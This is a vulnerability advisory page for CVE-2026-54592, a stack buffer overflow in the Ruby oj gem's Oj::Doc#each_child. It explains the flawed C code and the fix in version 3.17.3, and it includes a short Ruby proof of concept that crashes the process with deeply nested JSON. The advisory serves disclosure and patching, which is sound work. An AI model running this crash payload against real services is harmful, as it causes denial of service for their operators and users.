GHSA-3M6Q-JJ5J-38C9

Vulnerability from github – Published: 2026-06-19 19:36 – Updated: 2026-06-19 19:36
VLAI
Summary
Oj: Stack Buffer Overflow in Oj::Doc#each_child via Deeply Nested Input
Details

Summary

Oj::Doc#each_child, when invoked recursively over a deeply nested JSON document, overflows a fixed-size stack buffer and aborts the process. This is a denial of service reachable from untrusted JSON.

Details

Two-step chain in ext/oj/fast.c:

  1. doc_each_child (~line 1501) increments doc->where past the where_path[MAX_STACK = 100] array with no bounds check, and never restores it (doc->where-- is missing). Calling each_child recursively from inside the yield block therefore drives doc->where beyond the array.

  2. On the next entry (~line 1478) the function copies the path into a stack-local buffer:

c Leaf save_path[MAX_STACK]; // 800-byte stack buffer size_t wlen = doc->where - doc->where_path; if (0 < wlen) { memcpy(save_path, doc->where_path, sizeof(Leaf) * (wlen + 1)); }

When the previous recursive call left doc->where past where_path[100], wlen exceeds MAX_STACK and the memcpy overflows save_path on the C stack.

The Oj::Doc parser imposes no JSON nesting-depth limit (it relies on a C-stack pressure check), so deeply nested attacker input reaches this path.

Proof of Concept

require 'oj'
depth = 200
payload = '[' * depth + '1' + ']' * depth
Oj::Doc.open(payload) do |doc|
  r = lambda { doc.each_child { |_| r.call } }
  r.call
end

Recursion depth <= 99 iterates normally; depth >= 101 aborts. lldb backtrace on the affected build (ruby 3.3.8 / arm64-darwin24):

SIGABRT
#2 __abort
#3 __stack_chk_fail
#4 doc_each_child   (oj.bundle, fast.c)

Impact

Reliable denial of service: any endpoint that calls Oj::Doc.open(untrusted) { |d| d.each_child ... } recursively can be crashed with a small deeply-nested payload. On builds with a stack protector (the default, -fstack-protector-strong) the canary aborts the process before the saved return address is used. The Step-1 heap OOB writes into struct _doc fields do occur, but are masked in practice because the Step-2 stack overflow crashes first; turning them into anything beyond a crash has not been demonstrated.

Patches

Fixed in 3.17.3: doc_each_child now bounds-checks before incrementing doc->where (raising Oj::DepthError) and restores doc->where after the loop, matching the existing each_leaf pattern. Verified on the fixed build: depth >= 101 raises a clean Oj::DepthError instead of aborting.

Credit

Reported by Zac Wang (@7a6163).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "oj"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.17.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54592"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125",
      "CWE-787"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T19:36:28Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`Oj::Doc#each_child`, when invoked recursively over a deeply nested JSON\ndocument, overflows a fixed-size stack buffer and aborts the process. This is a\ndenial of service reachable from untrusted JSON.\n\n### Details\n\nTwo-step chain in `ext/oj/fast.c`:\n\n1. **`doc_each_child` (~line 1501)** increments `doc-\u003ewhere` past the\n   `where_path[MAX_STACK = 100]` array with no bounds check, and never restores\n   it (`doc-\u003ewhere--` is missing). Calling `each_child` recursively from inside\n   the yield block therefore drives `doc-\u003ewhere` beyond the array.\n\n2. **On the next entry (~line 1478)** the function copies the path into a\n   stack-local buffer:\n\n   ```c\n   Leaf  save_path[MAX_STACK];           // 800-byte stack buffer\n   size_t wlen = doc-\u003ewhere - doc-\u003ewhere_path;\n   if (0 \u003c wlen) {\n       memcpy(save_path, doc-\u003ewhere_path, sizeof(Leaf) * (wlen + 1));\n   }\n   ```\n\n   When the previous recursive call left `doc-\u003ewhere` past `where_path[100]`,\n   `wlen` exceeds `MAX_STACK` and the `memcpy` overflows `save_path` on the C\n   stack.\n\nThe `Oj::Doc` parser imposes no JSON nesting-depth limit (it relies on a\nC-stack pressure check), so deeply nested attacker input reaches this path.\n\n### Proof of Concept\n\n```ruby\nrequire \u0027oj\u0027\ndepth = 200\npayload = \u0027[\u0027 * depth + \u00271\u0027 + \u0027]\u0027 * depth\nOj::Doc.open(payload) do |doc|\n  r = lambda { doc.each_child { |_| r.call } }\n  r.call\nend\n```\n\nRecursion depth \u003c= 99 iterates normally; depth \u003e= 101 aborts. lldb backtrace\non the affected build (`ruby 3.3.8 / arm64-darwin24`):\n\n```\nSIGABRT\n#2 __abort\n#3 __stack_chk_fail\n#4 doc_each_child   (oj.bundle, fast.c)\n```\n\n### Impact\n\nReliable denial of service: any endpoint that calls\n`Oj::Doc.open(untrusted) { |d| d.each_child ... }` recursively can be crashed\nwith a small deeply-nested payload. On builds with a stack protector (the\ndefault, `-fstack-protector-strong`) the canary aborts the process before the\nsaved return address is used. The Step-1 heap OOB writes into `struct _doc`\nfields do occur, but are masked in practice because the Step-2 stack overflow\ncrashes first; turning them into anything beyond a crash has not been\ndemonstrated.\n\n### Patches\n\nFixed in **3.17.3**: `doc_each_child` now bounds-checks before incrementing\n`doc-\u003ewhere` (raising `Oj::DepthError`) and restores `doc-\u003ewhere` after the\nloop, matching the existing `each_leaf` pattern. Verified on the fixed build:\ndepth \u003e= 101 raises a clean `Oj::DepthError` instead of aborting.\n\n### Credit\n\nReported by Zac Wang (@7a6163).",
  "id": "GHSA-3m6q-jj5j-38c9",
  "modified": "2026-06-19T19:36:28Z",
  "published": "2026-06-19T19:36:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ohler55/oj/security/advisories/GHSA-3m6q-jj5j-38c9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ohler55/oj"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Oj: Stack Buffer Overflow in Oj::Doc#each_child via Deeply Nested Input"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…